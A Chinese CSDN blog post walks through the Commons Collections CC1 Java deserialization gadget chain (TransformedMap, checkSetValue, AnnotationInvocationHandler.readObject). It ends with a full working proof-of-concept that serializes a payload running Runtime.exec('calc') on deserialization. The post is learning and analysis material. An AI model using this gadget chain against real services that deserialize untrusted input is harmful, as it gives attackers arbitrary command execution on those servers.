java cc1链后续

最新推荐文章于 2024-08-25 22:29:30 发布
最新推荐文章于 2024-08-25 22:29:30 发布
阅读量396 收藏 10
点赞数 11
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135389948
版权
文章详细解析了JavaCC中ChainedTransformer的使用,涉及漏洞利用路径,重点讨论了如何通过Decorate方法和Transformers进行控制,以及序列化和反序列化过程中关键方法如transformValue、checkSetValue和readObject的调用过程。
摘要由CSDN通过智能技术生成

java cc1链后续
上篇已经了解,漏洞出现的方法在InvokerTransformer.transform方法中,并且通过ChainedTransformer.transform进行了调用利用,这里查找有那些方法调用了ChainedTransformer.transform,(右键->转到->声明或用例),这里找到了TransformedMap类里面的transformValue,由于是被protected修饰的,然后找到了put方法,transformValue方法中的valueTransformer是由TransformedMap,也是被protected修饰的,所以找到了decorate方法
代码如下

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}

protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    super(map);
    this.keyTransformer = keyTransformer;
    this.valueTransformer = valueTransformer;
}

    protected Object transformValue(Object object) {
        if (valueTransformer == null) {
            return object;
        }
        return valueTransformer.transform(object);
    }

public Object put(Object key, Object value) {
    key = transformKey(key);
    value = transformValue(value);
    return getMap().put(key, value);
}

不考虑getRutime的情况下,直接利用InvokerTransformer.transform方法

InvokerTransformer a=   new InvokerTransformer("exec", new Class[]{String.class},        new Object[]{"calc"});
Map b=new HashMap();
Map c = TransformedMap.decorate(b, null, a);
c.put("aaa",Runtime.getRuntime());

考虑getRuntime序列化的话,则变为

Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                    new Class[]{String.class, Class[].class},
                    new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke",
                    new Class[]{Object.class, Object[].class},
                    new Object[]{null, null}),
            new InvokerTransformer("exec",
                    new Class[]{String.class},
                    new String[]{"Calc.exe"}),
    };

    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
    outerMap.put("test", "666");

因为这里面运行了ConstantTransformer.transform方法,所以在put方法中不用传入Runtime.getRuntime(),至于为什么传入的分别是Runtime.getRuntime()Runtime.class,上篇已给出解释
但最后的目的是反序列化,也就是readObject,这里跟着前人的想法找到了checkSetValue方法,实际上checkSetValuetransformValue大体相同,checkSetValuereadObject的距离相对较近,可能会有别的路线,但是调用put的有几千个方法,还要一层一层的往上找,就不找别的了

protected Object checkSetValue(Object value) {
    return valueTransformer.transform(value);
}

右键查找只有一个方法调用了checkSetValue方法,在AbstractInputCheckedMapDecorator下面的setValue方法,在AnnotationInvocationHandlerreadObject方法中调用了setValue方法。

AbstractInputCheckedMapDecorator下面的setValue方法,刚好是用来修改Map键值对中的属性值的,这里使用循环遍历数组或者查看特定属性名均可

        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
        Map<Object, Object> map = new HashMap<>();
        map.put("apple", 111);
        Map<Object, Object> transformedmap = TransformedMap.decorate (map, null, invokerTransformer);
        Map.Entry<Object, Object> entry = transformedmap.entrySet().stream()
                .filter(e -> e.getKey().equals("apple"))
                .findFirst()
                .orElse(null);
        entry.setValue(r);

或者

for (Map.Entry<Object, Object> entry : transformedmap.entrySet()) {
           entry.setValue(r);
       }

AnnotationInvocationHandlerreadObject方法中就是这种for循环遍历然后调用setValue方法

for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
    String name = memberValue.getKey();
    Class<?> memberType = memberTypes.get(name);
    if (memberType != null) {  // i.e. member still exists
        Object value = memberValue.getValue();
        if (!(memberType.isInstance(value) ||
              value instanceof ExceptionProxy)) {
            memberValue.setValue(
                new AnnotationTypeMismatchExceptionProxy(
                    value.getClass() + "[" + value + "]").setMember(
                        annotationType.members().get(name)));
        }
    }
}

这里需要修改的就是memberValues的值,而memberValues的值是由

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
    Class<?>[] superInterfaces = type.getInterfaces();
    if (!type.isAnnotation() ||
        superInterfaces.length != 1 ||
        superInterfaces[0] != java.lang.annotation.Annotation.class)
        throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
    this.type = type;
    this.memberValues = memberValues;
}

构造器决定的,由于该构造器为私有方法.只能通过反射的方式进行调用,通过反射创建一个实例,当实例被反序列化时,实例中的readObject方法会自动执行,由于这里的构造方法为私有方法,所以只能够通过反射进行调用

Class c=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor constructor=c.getDeclaredConstructor(Class.class, Map.class);//获取构造方法
constructor.setAccessible(true);//改变私有属性
Object o=constructor.newInstance(Target.class,transformedmap);//创建实例

由于这里memeberType是获取注解中成员变量的名称,然后并且检查键值对中键名是否有对应的名称,而所使用的注解Override是没有成员变量的:

@Target(ElementType.METHOD)
@Retention(RetentionPolicy.SOURCE)
public @interface Override {
}

这里使用target

@Documented
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.ANNOTATION_TYPE)
public @interface Target {
    ElementType[] value();
}

然后再加上序列化和反序列化方法,最后的poc为

public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("person.bin"));
        oos.writeObject(object);
    }
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();

    }
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);

        HashMap<Object,Object> map=new HashMap<>();
        map.put("value","gxngxngxn");
        Map<Object,Object> transformedmap= TransformedMap.decorate(map,null,chainedTransformer);

        Class c=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor=c.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);
        Object o=constructor.newInstance(Target.class,transformedmap);
        serialize(o);
        unserialize("person.bin");
   }

代码运行流程
反序列化时,由于序列化的是一个实例,自动执行实例下面的readObject()方法,readObject()-->setValue()-->checkSetValue()->ChainedTransformer.transform()-->ConstantTransformer.transform()-->InvokerTransformer.transform()
由于readObject()–>setValue()传入的参数为

new AnnotationTypeMismatchExceptionProxy(
value.getClass() + "[" + value + "]").setMember(annotationType.members().get(name))

使用ConstantTransformer.transform()方法替换为Runtime.class

这两篇更多的是根据poc来进行分片分析,涉及的方面有些许遗漏,还请见谅

大佬 菜菜 带带

天下是个小趴菜
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JAVA代码开发规范1
08-03
### JAVA代码开发规范详解 #### 一、格式规范 Java作为一种广泛使用的编程语言,其代码...以上规范总结了Java代码开发过程中的一些最佳实践,遵循这些规范不仅有助于提高代码的质量,还能显著降低后续维护的成本。
java-spider.zip
08-22
1. **Java基础**:作为爬虫的基础,Java是一种面向对象的编程语言,提供了丰富的库和工具,如Jsoup和HttpClient,用于解析HTML和发送网络请求。了解Java语法、类、对象以及异常处理是编写Java爬虫的前提。 2. **...
JAVA实践考核北邮
11-03
- **应用方向**:为后续课程的学习、利用JSP进行IMS(Integrated Management System)开发提供坚实的基础。 #### 二、考核环境 - **基本运行环境**:Windows XP + J2SDK 1.5 - **开发工具**:Eclipse 3.2 英文版 - ...
2023 技術點總結 flink java
02-19
1. **KeyBy操作**:首先对两个流分别进行`keyBy()`操作,确保相同键值的数据能在后续处理中被正确匹配。 2. **Connect操作**:接着使用`connect()`方法连接两个已键化的流。 3. **CoProcessFunction应用**:通过...
CC150:cc150面试实践
07-03
"CC150"可能是指一个特定的面试准备资源集合,它聚焦于Java编程语言,帮助求职者增强其在Java领域的知识深度和广度,以便在面试中脱颖而出。这个资源可能是由一位经验丰富的开发者或者教练创建的,旨在帮助应聘者...
开发多线程程序时,需要注意那些问题
OO_SEN的博客
08-23 543
线程安全 竞态条件(Race Condition):当多个线程同时访问和修改共享资源时,可能会出现竞态条件,导致不确定的行为。需要通过同步机制(如互斥锁、读写锁、原子操作)来保护共享资源。 死锁(Deadlock):当两个或多个线程相互等待对方释放锁时,程序会陷入死锁状态。避免死锁的一些策略包括:避免嵌套锁、确保加锁顺序一致、使用超时机制等。 活锁(Livelock):与死锁不同,活锁是指线程不断地尝试获取资源但总是失败,导致无法继续执行。避免频繁重试操作或使用退避算法可以减少活锁的发生。 优先级反转(P
Yolov8:模型部署到安卓端
m0_70694811的博客
08-21 786
下载安装jdk-8u202-windows-x64.exe,这篇文章有百度网盘资源接,直接下载,并按照这篇文章的JDK步骤进行安装和环境变量配置。C:\Program Files\Java\jdk-1.8\bin和C:\Program Files\Java\jdk-1.8\jre\bin。比如因为我的jdk路径是C:\Program Files\Java\jdk-1.8,所以这两个相对路径就改成。参考这边文章的USB驱动设置和手机端设置。同意协议后,下载相应版本的JDK。
笔记redis
风止的博客
08-22 1052
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库。
@Transactional中使用线程锁导致了锁失效与解决方案
liuruiaaa的博客
08-23 752
@Transactional中使用线程锁导致了锁失效与解决方案
JavaScript 错误 - Throw 和 Try to Catch的使用
逆风优雅的博客
08-23 156
trycatchthrow上面的代码 因为 try中 没有adddlert这个方法,或者这个方法有误,这时,代码会执行catch部分。JavaScript 实际上会创建带有两个属性的Error 对象name和message。
使用Java通过身份证号码匹配省市县名称的技术博客
weixin_41489908的博客
08-21 350
每日自动更新各类学习教程及工具下载合集​​在中国,身份证号码包含了持有人的出生地信息。通过解析身份证号码的前六位,我们可以获取对应的省、市、县(区)信息。在这篇博客中,我们将探讨如何使用Java代码来实现这一功能,并展示详细的代码示例和运行结果。
Java中自定义注解的使用
echola_mendes的博客
08-22 1002
以【记录操作日志】为例,一般在开发中为了记录用户操作,当系统出现问题时,可以追溯日志所提供详细的错误信息,帮助开发者快速定位问题的原因最简单的方法:在每个方法中增加日志信息打印代码,来记录操作日志,但是这样重复代码也很多,也不易扩展,而且易出错使用自定义注解就会方便很多,减少不必要的重复代码,减少非业务代码的侵入性,如果需要扩展操作用户的信息以及IP就会很方便,易于扩展和维护@interface在需要使用自定义注解的地方使用该注解@LogOperation("新增")// 方法实现。
如何用Java SpringBoot+Vue搭建校内跑腿业务系统?实战教程解析
WEIXIN_JSJBCZDS的博客
08-21 983
如何用Java SpringBoot+Vue搭建校内跑腿业务系统?实战教程解析 【毕设攻略】Java SpringBoot+Vue打造校内跑腿系统!从零开始,手把手教你构建完整的业务流程。实战教程,技术难点全解析,让你的毕设项目脱颖而出,校园创业从这里启航!点击视频,开启你的编程之旅!
单例模式和多例模式
qq_68874993的博客
08-21 1304
本文内容是单例模式和多例模式的基本介绍及其区别
42.接雨水 |76.最小覆盖子串 | 85.最大矩形 | 84.柱状图中最大矩形面积 |
Avery51N0W的博客
08-21 228
如果找第一个比他小的,站内单调递减;如果找第一个比他大的,站内单调递增;单调栈应用找第一个比i大或者小的情况;
JDK8新特性【Lambda表达式】
weixin_61898502的博客
08-22 994
lambda就是简化了匿名内部类的写法lambda其实就是接口方法的重写lambda的参数和返回值是根据接口方法决定的。
Mybatis--其他查询操作和数据库连接池(下下)
最新发布
2202_76101487的博客
08-25 157
本文写了mybatis持久层对数据库操作时候的一些注意细节和注意事项; 对应实体类model: 1. 多表查询 多表查询和单表查询差不多,只是SQL代码不同,下面是xml的配置文件: ArticleInfoMapper接口代码如下: 测试类代码如下: articleInfo和userinfo表如下: 运行测试类代码,结果如下:
第二百零六节 Java正则表达式教程 - Java 正则表达式查找/替换
2301_78772942的博客
08-22 166
第二百零六节 Java正则表达式教程 - Java 正则表达式查找/替换
【SpringCloud Alibaba】(八)学习 Sentinel 核心技术与配置规则(下)
sco5282的博客
08-25 438
在 Sentinel 中,指定发生异常时的处理策略非常简单,只需要使用注解即可。@Inherited//资源名称//entry类型,标记流量的方向,取值IN/OUT,默认是OUT//处理BlockException的函数名称,函数要求://1. 必须是 public//2.返回类型 参数与原方法一致//3. 默认需和原方法在同一个类中。若希望使用其他类的函数,可配置//blockHandlerClass ,并指定blockHandlerClass里面的方法。
JAVA编码规范详解:命名、注释、缩进与文件管理
- 方法名通常由动词或动词词组构成,首字母小写,后续单词首字母大写,如`setNeekeName`。 - 变量名首字母小写,多单词时首字母大写,如`neekeName`、`neekeAddress`,避免使用单字符变量,除非是临时变量。 - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值